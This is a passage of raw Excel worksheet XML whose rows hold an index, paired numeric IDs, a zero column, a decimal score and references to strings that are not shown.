      </c>
    </row>
    <row r="22" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A22" s="1">
        <v>20</v>
      </c>
      <c r="B22">
        <v>4526</v>
      </c>
      <c r="C22">
        <v>4526</v>
      </c>
      <c r="D22">
        <v>0</v>
      </c>
      <c r="E22">
        <v>0.42660000920295721</v>
      </c>
      <c r="F22" t="s">
        <v>7</v>
      </c>
      <c r="G22" t="s">
        <v>48</v>
      </c>
      <c r="H22" t="s">
        <v>49</v>
      </c>
    </row>
    <row r="23" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A23" s="1">
        <v>21</v>
      </c>
      <c r="B23">
        <v>1977</v>
      </c>
      <c r="C23">
        <v>1977</v>
      </c>
      <c r="D23">
        <v>0</v>
      </c>
      <c r="E23">
        <v>0.99800002574920654</v>
      </c>
      <c r="F23" t="s">
        <v>7</v>
      </c>
      <c r="G23" t="s">
        <v>50</v>
      </c>
      <c r="H23" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="24" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A24" s="1">
        <v>22</v>
      </c>
      <c r="B24">
        <v>1978</v>
      </c>
      <c r="C24">
        <v>1978</v>
      </c>
      <c r="D24">
        <v>0</v>
      </c>
      <c r="E24">
        <v>0.99610000848770142</v>
      </c>
      <c r="F24" t="s">
        <v>7</v>
      </c>
      <c r="G24" t="s">
        <v>52</v>
      </c>
      <c r="H24" t="s">
        <v>53</v>
      </c>
    </row>
    <row r="25" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A25" s="1">
        <v>23</v>
      </c>
      <c r="B25">
        <v>1982</v>
      </c>
      <c r="C25">
        <v>1982</v>
      </c>
      <c r="D25">
        <v>0</v>
      </c>
      <c r="E25">
        <v>0.54290002584457397</v>
      </c>
      <c r="F25" t="s">
        <v>7</v>
      </c>
      <c r="G25" t="s">
        <v>54</v>
      </c>
      <c r="H25" t="s">
        <v>55</v>
      </c>
    </row>
    <row r="26" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A26" s="1">
        <v>24</v>
      </c>
      <c r="B26">
        <v>4539</v>
      </c>
      <c r="C26">
        <v>4539</v>
      </c>
      <c r="D26">
        <v>0</v>
      </c>
      <c r="E26">
        <v>0.71770000457763672</v>
      </c>
      <c r="F26" t="s">
        <v>7</v>
      </c>
      <c r="G26" t="s">
        <v>56</v>
      </c>
      <c r="H26" t="s">
        <v>57</v>
      </c>
    </row>
    <row r="27" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A27" s="1">
        <v>25</v>
      </c>
      <c r="B27">
        <v>1989</v>
      </c>
      <c r="C27">
        <v>1989</v>
      </c>
      <c r="D27">
        <v>0</v>
      </c>
      <c r="E27">
        <v>0.51590001583099365</v>
      </c>
      <c r="F27" t="s">
        <v>7</v>
      </c>
      <c r="G27" t="s">
        <v>58</v>
      </c>
      <c r="H27" t="s">
        <v>59</v>
      </c>
    </row>
    <row r="28" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A28" s="1">
        <v>26</v>
      </c>
      <c r="B28">
        <v>4536</v>
      </c>
      <c r="C28">
        <v>4536</v>
      </c>
      <c r="D28">
        <v>0</v>
      </c>
      <c r="E28">
        <v>0.74049997329711914</v>
      </c>
      <c r="F28" t="s">
        <v>7</v>
      </c>
      <c r="G28" t="s">
        <v>60</v>
      </c>
      <c r="H28" t="s">
        <v>61</v>
      </c>
    </row>
    <row r="29" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A29" s="1">
        <v>27</v>
      </c>
      <c r="B29">
        <v>4533</v>
      </c>
      <c r="C29">
        <v>4533</v>
      </c>
      <c r="D29">
        <v>0</v>
      </c>
      <c r="E29">
        <v>0.68699997663497925</v>
      </c>
      <c r="F29" t="s">
        <v>7</v>
      </c>
      <c r="G29" t="s">
        <v>62</v>
      </c>
      <c r="H29" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="30" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A30" s="1">
        <v>28</v>
      </c>
      <c r="B30">
        <v>5986</v>
      </c>
      <c r="C30">
        <v>5986</v>
      </c>
      <c r="D30">
        <v>0</v>
      </c>
      <c r="E30">
        <v>0.857200026512146</v>
      </c>
      <c r="F30" t="s">
        <v>7</v>
      </c>
      <c r="G30" t="s">
        <v>64</v>
      </c>
      <c r="H30" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="31" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A31" s="1">
        <v>29</v>
      </c>
      <c r="B31">
        <v>7043</v>
      </c>
      <c r="C31">
        <v>7043</v>
      </c>
      <c r="D31">
        <v>0</v>
      </c>
      <c r="E31">
        <v>0.96810001134872437</v>
      </c>
      <c r="F31" t="s">
        <v>7</v>
      </c>
      <c r="G31" t="s">
        <v>66</v>
      </c>
      <c r="H31" t="s">
        <v>67</v>
      </c>
    </row>
    <row r="32" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A32" s="1">
        <v>30</v>
      </c>
      <c r="B32">
        <v>7042</v>
      </c>
      <c r="C32">
        <v>7042</v>
      </c>
      <c r="D32">
        <v>0</v>
      </c>
      <c r="E32">
        <v>0.84869998693466187</v>
      </c>
      <c r="F32" t="s">
        <v>7</v>
      </c>
      <c r="G32" t="s">
        <v>68</v>
      </c>
      <c r="H32" t="s">
        <v>69</v>
      </c>
    </row>
    <row r="33" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A33" s="1">
        <v>31</v>
      </c>
      <c r="B33">
        <v>7041</v>
      </c>
      <c r="C33">
        <v>7041</v>
      </c>
      <c r="D33">
        <v>0</v>
      </c>
      <c r="E33">
        <v>0.74699997901916504</v>
      </c>
      <c r="F33" t="s">
        <v>7</v>
      </c>
      <c r="G33" t="s">
        <v>70</v>
      </c>
      <c r="H33" t="s">
        <v>71</v>
      </c>
    </row>
    <row r="34" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A34" s="1">
        <v>32</v>
      </c>
      <c r="B34">
        <v>2004</v>
      </c>
      <c r="C34">
        <v>2004</v>
      </c>
      <c r="D34">
        <v>0</v>
      </c>
      <c r="E34">
        <v>0.51520001888275146</v>
      </c>
      <c r="F34" t="s">
        <v>7</v>
      </c>
      <c r="G34" t="s">
        <v>72</v>
      </c>
      <c r="H34" t="s">
        <v>73</v>
      </c>
    </row>
    <row r="35" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A35" s="1">
        <v>33</v>
      </c>
      <c r="B35">
        <v>7040</v>
      </c>
      <c r="C35">
        <v>7040</v>
      </c>
      <c r="D35">
        <v>0</v>
      </c>
      <c r="E35">
        <v>0.99599999189376831</v>
      </c>
      <c r="F35" t="s">
        <v>7</v>
      </c>
      <c r="G35" t="s">
        <v>74</v>
      </c>
      <c r="H35" t="s">
        <v>75</v>
      </c>
    </row>
    <row r="36" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A36" s="1">
        <v>34</v>
      </c>
      <c r="B36">
        <v>5981</v>
      </c>
      <c r="C36">
        <v>5981</v>
      </c>
      <c r="D36">
        <v>0</v>
      </c>
      <c r="E36">
        <v>0.7336999773979187</v>
      </c>
      <c r="F36" t="s">
        <v>7</v>
      </c>
      <c r="G36" t="s">
        <v>76</v>
      </c>
      <c r="H36" t="s">
        <v>77</v>
      </c>
    </row>
    <row r="37" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A37" s="1">
        <v>35</v>
      </c>
      <c r="B37">
        <v>5985</v>
      </c>
      <c r="C37">
        <v>5985</v>
      </c>
      <c r="D37">
        <v>0</v>
      </c>
      <c r="E37">
        <v>0.53890001773834229</v>
      </c>
      <c r="F37" t="s">
        <v>7</v>
      </c>
      <c r="G37" t="s">
        <v>78</v>
      </c>
      <c r="H37" t="s">
        <v>79</v>
      </c>
    </row>
    <row r="38" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A38" s="1">
        <v>36</v>
      </c>
      <c r="B38">
        <v>4527</v>
      </c>
      <c r="C38">
        <v>4527</v>
      </c>
      <c r="D38">
        <v>0</v>
      </c>
      <c r="E38">
        <v>0.49959999322891241</v>
      </c>
      <c r="F38" t="s">
        <v>7</v>
      </c>
      <c r="G38" t="s">
        <v>80</v>
      </c>
      <c r="H38" t="s">
        <v>81</v>
      </c>
    </row>
    <row r="39" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A39" s="1">
        <v>37</v>
      </c>
      <c r="B39">
        <v>2000</v>
      </c>
      <c r="C39">
        <v>2000</v>
      </c>
      <c r="D39">
        <v>0</v>
      </c>
      <c r="E39">
        <v>0.98970001935958862</v>
      </c>
      <c r="F39" t="s">
        <v>7</v>
      </c>
      <c r="G39" t="s">
        <v>82</v>
      </c>
      <c r="H39" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="40" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A40" s="1">
        <v>38</v>
      </c>
      <c r="B40">
        <v>4542</v>
      </c>
      <c r="C40">
        <v>4542</v>
      </c>
      <c r="D40">
        <v>0</v>
      </c>
      <c r="E40">
        <v>0.73839998245239258</v>
      </c>
      <c r="F40" t="s">
        <v>7</v>
      </c>
      <c r="G40" t="s">
        <v>84</v>
      </c>
      <c r="H40" t="s">
        <v>85</v>
      </c>
    </row>
    <row r="41" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A41" s="1">
        <v>39</v>
      </c>
      <c r="B41">
        <v>2044</v>
      </c>
      <c r="C41">
        <v>2044</v>
      </c>
      <c r="D41">
        <v>0</v>
      </c>
      <c r="E41">
        <v>0.61549997329711914</v>
      </c>
      <c r="F41" t="s">
        <v>7</v>
      </c>
      <c r="G41" t="s">
        <v>86</v>
      </c>
      <c r="H41" t="s">
        <v>87</v>
      </c>
    </row>
    <row r="42" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A42" s="1">
        <v>40</v>
      </c>
      <c r="B42">
        <v>5995</v>
      </c>
      <c r="C42">
        <v>5995</v>
      </c>
      <c r="D42">
        <v>0</v>
      </c>
      <c r="E42">
        <v>0.82840001583099365</v>
      </c>
      <c r="F42" t="s">
        <v>7</v>
      </c>
      <c r="G42" t="s">
        <v>88</v>
      </c>
      <c r="H42" t="s">
        <v>89</v>
      </c>
    </row>
    <row r="43" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A43" s="1">
        <v>41</v>
      </c>
      <c r="B43">
        <v>6994</v>
      </c>
      <c r="C43">
        <v>6994</v>
      </c>
      <c r="D43">
        <v>0</v>
      </c>
      <c r="E43">
        <v>0.88370001316070557</v>
      </c>
      <c r="F43" t="s">
        <v>7</v>
      </c>
      <c r="G43" t="s">
        <v>90</v>
      </c>
      <c r="H43" t="s">
        <v>91</v>
      </c>
    </row>
    <row r="44" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A44" s="1">
        <v>42</v>
      </c>
      <c r="B44">
        <v>4487</v>
      </c>
      <c r="C44">
        <v>4487</v>
      </c>
      <c r="D44">
        <v>0</v>
      </c>
      <c r="E44">
        <v>0.72259998321533203</v>
      </c>
      <c r="F44" t="s">
        <v>7</v>
      </c>
      <c r="G44" t="s">
        <v>92</v>
      </c>
      <c r="H44" t="s">
        <v>93</v>
      </c>
    </row>
    <row r="45" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A45" s="1">
        <v>43</v>
      </c>
      <c r="B45">
        <v>4481</v>
      </c>
      <c r="C45">
        <v>4481</v>
      </c>
      <c r="D45">
        <v>0</v>
      </c>
      <c r="E45">
        <v>0.7750999927520752</v>
      </c>
      <c r="F45" t="s">
        <v>7</v>
      </c>
      <c r="G45" t="s">
        <v>94</v>
      </c>
      <c r="H45" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="46" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A46" s="1">
        <v>44</v>
      </c>
      <c r="B46">
        <v>4479</v>
      </c>
      <c r="C46">
        <v>4479</v>
      </c>
      <c r="D46">
        <v>0</v>
      </c>
      <c r="E46">
        <v>0.99320000410079956</v>
      </c>
      <c r="F46" t="s">
        <v>7</v>
      </c>
      <c r="G46" t="s">
        <v>96</v>
      </c>
      <c r="H46" t="s">
        <v>97</v>
      </c>
    </row>
    <row r="47" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A47" s="1">
        <v>45</v>
      </c>
      <c r="B47">
        <v>4478</v>
      </c>
      <c r="C47">
        <v>4478</v>
      </c>
      <c r="D47">
        <v>0</v>
      </c>
      <c r="E47">
        <v>0.79280000925064087</v>
      </c>
      <c r="F47" t="s">
        <v>7</v>
      </c>
      <c r="G47" t="s">
        <v>98</v>
      </c>
      <c r="H47" t="s">
        <v>99</v>
      </c>
    </row>
    <row r="48" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A48" s="1">
        <v>46</v>
      </c>
      <c r="B48">
        <v>4474</v>
      </c>
      <c r="C48">
        <v>4474</v>
      </c>
      <c r="D48">
        <v>0</v>
      </c>
      <c r="E48">
        <v>0.65049999952316284</v>
      </c>
      <c r="F48" t="s">
        <v>7</v>
      </c>
      <c r="G48" t="s">
        <v>100</v>
      </c>
      <c r="H48" t="s">
        <v>101</v>
      </c>
    </row>
    <row r="49" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A49" s="1">
        <v>47</v>
      </c>
      <c r="B49">
        <v>4470</v>
      </c>
      <c r="C49">
        <v>4470</v>
      </c>
      <c r="D49">
        <v>0</v>
      </c>
      <c r="E49">
        <v>0.74070000648498535</v>
      </c>
      <c r="F49" t="s">
        <v>7</v>
      </c>
      <c r="G49" t="s">
        <v>102</v>
      </c>
      <c r="H49" t="s">
        <v>103</v>
      </c>
    </row>
    <row r="50" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A50" s="1">
        <v>48</v>
      </c>
      <c r="B50">
        <v>6995</v>
      </c>
      <c r="C50">
        <v>6995</v>
      </c>
      <c r="D50">
        <v>0</v>
      </c>
      <c r="E50">
        <v>0.8377000093460083</v>
      </c>
      <c r="F50" t="s">
        <v>7</v>
      </c>
      <c r="G50" t="s">
        <v>104</v>
      </c>
      <c r="H50" t="s">
        <v>105</v>
      </c>
    </row>
    <row r="51" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A51" s="1">
        <v>49</v>
      </c>
      <c r="B51">
        <v>6991</v>
      </c>
      <c r="C51">
        <v>6991</v>
      </c>
      <c r="D51">
        <v>0</v>
      </c>
      <c r="E51">
        <v>0.79549998044967651</v>
      </c>
      <c r="F51" t="s">
        <v>7</v>
      </c>
      <c r="G51" t="s">
        <v>106</v>
      </c>
      <c r="H51" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="52" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A52" s="1">
        <v>50</v>
      </c>
      <c r="B52">
        <v>6990</v>
      </c>
      <c r="C52">
        <v>6990</v>
      </c>
      <c r="D52">
        <v>0</v>
      </c>
      <c r="E52">
        <v>0.7906000018119812</v>
      </c>
      <c r="F52" t="s">
        <v>7</v>
      </c>
      <c r="G52" t="s">
        <v>108</v>
      </c>
      <c r="H52" t="s">
        <v>109</v>
      </c>
    </row>
    <row r="53" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A53" s="1">
        <v>51</v>
      </c>
      <c r="B53">
        <v>6988</v>
      </c>
      <c r="C53">
        <v>6988</v>
      </c>
      <c r="D53">
        <v>0</v>
      </c>
      <c r="E53">
        <v>0.83590000867843628</v>
      </c>
      <c r="F53" t="s">
        <v>7</v>
      </c>
      <c r="G53" t="s">
        <v>110</v>
      </c>
      <c r="H53" t="s">
        <v>111</v>
      </c>
    </row>
    <row r="54" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A54" s="1">
        <v>52</v>
      </c>
      <c r="B54">
        <v>4466</v>
      </c>
      <c r="C54">
        <v>4466</v>
      </c>
      <c r="D54">
        <v>0</v>
      </c>
      <c r="E54">
        <v>0.99309998750686646</v>
      </c>
      <c r="F54" t="s">
        <v>7</v>
      </c>
      <c r="G54" t="s">
        <v>112</v>
      </c>
      <c r="H54" t="s">
        <v>113</v>
      </c>
    </row>
    <row r="55" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A55" s="1">
        <v>53</v>
      </c>
      <c r="B55">
        <v>2113</v>
      </c>
      <c r="C55">
        <v>2113</v>
      </c>
      <c r="D55">
        <v>0</v>
      </c>
      <c r="E55">
        <v>0.62970000505447388</v>
      </c>
      <c r="F55" t="s">
        <v>7</v>
      </c>
      <c r="G55" t="s">
        <v>114</v>
      </c>
      <c r="H55" t="s">
        <v>115</v>
      </c>
    </row>
    <row r="56" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A56" s="1">
        <v>54</v>
      </c>
      <c r="B56">
        <v>6984</v>
      </c>
      <c r="C56">
        <v>6984</v>
      </c>
      <c r="D56">
        <v>0</v>
      </c>
      <c r="E56">
        <v>0.79400002956390381</v>
      </c>
      <c r="F56" t="s">
        <v>7</v>
      </c>
      <c r="G56" t="s">
        <v>116</v>
      </c>
      <c r="H56" t="s">
        <v>117</v>
      </c>
    </row>
    <row r="57" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A57" s="1">
        <v>55</v>
      </c>
      <c r="B57">
        <v>2124</v>
      </c>
      <c r="C57">
        <v>2124</v>
      </c>
      <c r="D57">
        <v>0</v>
      </c>
      <c r="E57">
        <v>0.7368999719619751</v>
      </c>
      <c r="F57" t="s">
        <v>7</v>
      </c>
      <c r="G57" t="s">
        <v>118</v>
      </c>
      <c r="H57" t="s">
        <v>119</v>
      </c>
    </row>
    <row r="58" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A58" s="1">
        <v>56</v>
      </c>
      <c r="B58">
        <v>2125</v>
      </c>
      <c r="C58">
        <v>2125</v>
      </c>
      <c r="D58">
        <v>0</v>
      </c>
      <c r="E58">
        <v>0.88990002870559692</v>
      </c>
      <c r="F58" t="s">
        <v>7</v>
      </c>
      <c r="G58" t="s">
        <v>120</v>
      </c>
      <c r="H58" t="s">
        <v>121</v>
      </c>
    </row>
    <row r="59" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A59" s="1">
        <v>57</v>
      </c>
      <c r="B59">
        <v>2106</v>
      </c>
      <c r="C59">
        <v>2106</v>
      </c>
      <c r="D59">
        <v>0</v>
      </c>
      <c r="E59">
        <v>0.82150000333786011</v>
      </c>
      <c r="F59" t="s">
        <v>7</v>
      </c>
      <c r="G59" t="s">
        <v>122</v>
      </c>
      <c r="H59" t="s">
        <v>123</v>
      </c>
    </row>
    <row r="60" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A60" s="1">
        <v>58</v>
      </c>
      <c r="B60">
        <v>2045</v>
      </c>
      <c r="C60">
        <v>2045</v>
      </c>
      <c r="D60">
        <v>0</v>
      </c>
      <c r="E60">
        <v>0.98619997501373291</v>
      </c>
      <c r="F60" t="s">
        <v>7</v>
      </c>
      <c r="G60" t="s">
        <v>124</v>
      </c>
      <c r="H60" t="s">
        <v>125</v>
      </c>
    </row>
    <row r="61" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A61" s="1">
        <v>59</v>
      </c>
      <c r="B61">
        <v>6996</v>
      </c>
      <c r="C61">
        <v>6996</v>
      </c>
      <c r="D61">
        <v>0</v>
      </c>
      <c r="E61">
        <v>0.73180001974105835</v>
      </c>
      <c r="F61" t="s">
        <v>7</v>
      </c>
      <c r="G61" t="s">
        <v>126</v>
      </c>
      <c r="H61" t="s">
        <v>127</v>
      </c>
    </row>
    <row r="62" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A62" s="1">
        <v>60</v>
      </c>
      <c r="B62">
        <v>2078</v>
      </c>
      <c r="C62">
        <v>2078</v>
      </c>
      <c r="D62">
        <v>0</v>
      </c>
      <c r="E62">
        <v>0.9650999903678894</v>
      </c>
      <c r="F62" t="s">
        <v>7</v>
      </c>
      <c r="G62" t="s">
        <v>128</v>
      </c>
      <c r="H62" t="s">
        <v>129</v>
      </c>
    </row>
    <row r="63" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A63" s="1">
        <v>61</v>
      </c>
      <c r="B63">
        <v>2048</v>
      </c>
      <c r="C63">
        <v>2048</v>
      </c>
      <c r="D63">
        <v>0</v>
      </c>
      <c r="E63">
        <v>0.99809998273849487</v>
      </c>
      <c r="F63" t="s">
        <v>7</v>
      </c>
      <c r="G63" t="s">
        <v>130</v>
      </c>
      <c r="H63" t="s">
        <v>131</v>
      </c>
    </row>
    <row r="64" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A64" s="1">
        <v>62</v>
      </c>
      <c r="B64">
        <v>4512</v>
      </c>
      <c r="C64">
        <v>4512</v>
      </c>
      <c r="D64">
        <v>0</v>
      </c>
      <c r="E64">
        <v>0.58899998664855957</v>
      </c>
      <c r="F64" t="s">
        <v>7</v>
      </c>
      <c r="G64" t="s">
        <v>132</v>
      </c>
      <c r="H64" t="s">
        <v>133</v>
      </c>
    </row>
    <row r="65" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A65" s="1">
        <v>63</v>
      </c>
      <c r="B65">
        <v>4511</v>
      </c>
      <c r="C65">
        <v>4511</v>
      </c>
      <c r="D65">
        <v>0</v>
      </c>
      <c r="E65">
        <v>0.8684999942779541</v>
      </c>
      <c r="F65" t="s">
        <v>7</v>
      </c>
      <c r="G65" t="s">
        <v>134</v>
      </c>
      <c r="H65" t="s">
        <v>135</v>
      </c>
    </row>
    <row r="66" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A66" s="1">
        <v>64</v>
      </c>
      <c r="B66">
        <v>4510</v>
      </c>
      <c r="C66">
        <v>4510</v>
      </c>
      <c r="D66">
        <v>0</v>
      </c>
      <c r="E66">
        <v>0.52109998464584351</v>
      </c>
      <c r="F66" t="s">
        <v>7</v>
      </c>
      <c r="G66" t="s">
        <v>136</v>
      </c>
      <c r="H66" t="s">
        <v>137</v>
      </c>
    </row>
    <row r="67" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A67" s="1">
        <v>65</v>
      </c>
      <c r="B67">
        <v>7009</v>
      </c>
      <c r="C67">
        <v>7009</v>
      </c>
      <c r="D67">
        <v>0</v>
      </c>
      <c r="E67">
        <v>0.69830000400543213</v>
      </c>
      <c r="F67" t="s">
        <v>7</v>
      </c>
      <c r="G67" t="s">
        <v>138</v>
      </c>
      <c r="H67" t="s">
        <v>139</v>
      </c>
    </row>
    <row r="68" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A68" s="1">
        <v>66</v>
      </c>
      <c r="B68">
        <v>7008</v>
      </c>
      <c r="C68">
        <v>7008</v>
      </c>
      <c r="D68">
        <v>0</v>
      </c>
      <c r="E68">
        <v>0.45770001411437988</v>
      </c>
      <c r="F68" t="s">
        <v>7</v>
      </c>
      <c r="G68" t="s">
        <v>140</v>
      </c>
      <c r="H68" t="s">
        <v>141</v>
      </c>
    </row>
    <row r="69" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A69" s="1">
        <v>67</v>
      </c>
      <c r="B69">
        <v>2056</v>
      </c>
      <c r="C69">
        <v>2056</v>
      </c>
      <c r="D69">
        <v>0</v>
      </c>
      <c r="E69">
        <v>0.98610001802444458</v>
      </c>
      <c r="F69" t="s">
        <v>7</v>
      </c>
      <c r="G69" t="s">
        <v>142</v>
      </c>
      <c r="H69" t="s">
        <v>143</v>
      </c>
    </row>
    <row r="70" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A70" s="1">
        <v>68</v>
      </c>
      <c r="B70">
        <v>4493</v>
      </c>
      <c r="C70">
        <v>4493</v>
      </c>
      <c r="D70">
        <v>0</v>
      </c>
      <c r="E70">
        <v>0.46419999003410339</v>
      </c>
      <c r="F70" t="s">
        <v>7</v>
      </c>
      <c r="G70" t="s">
        <v>144</v>
      </c>
      <c r="H70" t="s">
        <v>145</v>
      </c>
    </row>
    <row r="71" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A71" s="1">
        <v>69</v>
      </c>
      <c r="B71">
        <v>4507</v>
      </c>
      <c r="C71">
        <v>4507</v>
      </c>
      <c r="D71">
        <v>0</v>
      </c>
      <c r="E71">
        <v>0.96469998359680176</v>
      </c>
      <c r="F71" t="s">
        <v>7</v>
      </c>
      <c r="G71" t="s">
        <v>146</v>
      </c>
      <c r="H71" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="72" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A72" s="1">
        <v>70</v>
      </c>
      <c r="B72">
        <v>5999</v>
      </c>
      <c r="C72">
        <v>5999</v>
      </c>
      <c r="D72">
        <v>0</v>
      </c>
      <c r="E72">
        <v>0.62929999828338623</v>
      </c>
      <c r="F72" t="s">
        <v>7</v>
      </c>
      <c r="G72" t="s">
        <v>148</v>
      </c>
      <c r="H72" t="s">
        <v>149</v>
      </c>
    </row>
    <row r="73" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A73" s="1">
        <v>71</v>
      </c>
      <c r="B73">
        <v>6000</v>
      </c>
      <c r="C73">
        <v>6000</v>
      </c>
      <c r="D73">
        <v>0</v>
      </c>
      <c r="E73">
        <v>0.9715999960899353</v>
      </c>
      <c r="F73" t="s">
        <v>7</v>
      </c>
      <c r="G73" t="s">
        <v>150</v>
      </c>
      <c r="H73" t="s">
        <v>151</v>
      </c>
    </row>
    <row r="74" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A74" s="1">
        <v>72</v>
      </c>
      <c r="B74">
        <v>7002</v>
      </c>
      <c r="C74">
        <v>7002</v>
      </c>
      <c r="D74">
        <v>0</v>
      </c>
      <c r="E74">
        <v>0.80809998512268066</v>
      </c>
      <c r="F74" t="s">
        <v>7</v>
      </c>
      <c r="G74" t="s">
        <v>152</v>
      </c>
      <c r="H74" t="s">
        <v>153</v>
      </c>
    </row>
    <row r="75" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A75" s="1">
        <v>73</v>
      </c>
      <c r="B75">
        <v>2067</v>
      </c>
      <c r="C75">
        <v>2067</v>
      </c>
      <c r="D75">
        <v>0</v>
      </c>
      <c r="E75">
        <v>0.60439997911453247</v>
      </c>
      <c r="F75" t="s">
        <v>7</v>
      </c>
      <c r="G75" t="s">
        <v>154</v>
      </c>
      <c r="H75" t="s">
        <v>155</v>
      </c>
    </row>
    <row r="76" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A76" s="1">
        <v>74</v>
      </c>
      <c r="B76">
        <v>2072</v>
      </c>
      <c r="C76">
        <v>2072</v>
      </c>
      <c r="D76">
        <v>0</v>
      </c>
      <c r="E76">
        <v>0.54140001535415649</v>
      </c>
      <c r="F76" t="s">
        <v>7</v>
      </c>
      <c r="G76" t="s">
        <v>156</v>
      </c>
      <c r="H76" t="s">
        <v>157</v>
      </c>
    </row>
    <row r="77" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A77" s="1">
        <v>75</v>
      </c>
      <c r="B77">
        <v>2073</v>
      </c>
      <c r="C77">
        <v>2073</v>
      </c>
      <c r="D77">
        <v>0</v>
      </c>
      <c r="E77">
        <v>0.58230000734329224</v>
      </c>
      <c r="F77" t="s">
        <v>7</v>
      </c>
      <c r="G77" t="s">
        <v>158</v>
      </c>
      <c r="H77" t="s">
        <v>159</v>
      </c>
    </row>
    <row r="78" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A78" s="1">
        <v>76</v>
      </c>
      <c r="B78">
        <v>2075</v>
      </c>
      <c r="C78">
        <v>2075</v>
      </c>
      <c r="D78">
        <v>0</v>
      </c>
      <c r="E78">
        <v>0.9000999927520752</v>
      </c>
      <c r="F78" t="s">
        <v>7</v>
      </c>
      <c r="G78" t="s">
        <v>160</v>
      </c>
      <c r="H78" t="s">
        <v>161</v>
      </c>
    </row>
    <row r="79" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A79" s="1">
        <v>77</v>
      </c>
      <c r="B79">
        <v>5997</v>
      </c>
      <c r="C79">
        <v>5997</v>
      </c>
      <c r="D79">
        <v>0</v>
      </c>
      <c r="E79">
        <v>0.85600000619888306</v>
      </c>
      <c r="F79" t="s">
        <v>7</v>
      </c>
      <c r="G79" t="s">
        <v>162</v>
      </c>
      <c r="H79" t="s">
        <v>163</v>
      </c>
    </row>
    <row r="80" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A80" s="1">
        <v>78</v>
      </c>
      <c r="B80">
        <v>7054</v>
      </c>
      <c r="C80">
        <v>7054</v>
      </c>
      <c r="D80">
        <v>0</v>
      </c>
      <c r="E80">
        <v>0.57349997758865356</v>
      </c>
      <c r="F80" t="s">
        <v>7</v>
      </c>
      <c r="G80" t="s">
        <v>164</v>
      </c>
      <c r="H80" t="s">
        <v>165</v>
      </c>
    </row>
    <row r="81" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A81" s="1">
        <v>79</v>
      </c>
      <c r="B81">
        <v>5975</v>
      </c>
      <c r="C81">
        <v>5975</v>
      </c>
      <c r="D81">
        <v>0</v>
      </c>
      <c r="E81">
        <v>0.79670000076293945</v>
      </c>
      <c r="F81" t="s">
        <v>7</v>
      </c>
      <c r="G81" t="s">
        <v>166</v>
      </c>
      <c r="H81" t="s">
        <v>167</v>
      </c>
    </row>
    <row r="82" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A82" s="1">
        <v>80</v>
      </c>
      <c r="B82">
        <v>5973</v>
      </c>
      <c r="C82">
        <v>5973</v>
      </c>
      <c r="D82">
        <v>0</v>
      </c>
      <c r="E82">
        <v>0.99409997463226318</v>
      </c>
      <c r="F82" t="s">
        <v>7</v>
      </c>
      <c r="G82" t="s">
        <v>168</v>
      </c>
      <c r="H82" t="s">
        <v>169</v>
      </c>
    </row>
    <row r="83" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A83" s="1">
        <v>81</v>
      </c>
      <c r="B83">
        <v>1865</v>
      </c>
      <c r="C83">
        <v>1865</v>
      </c>
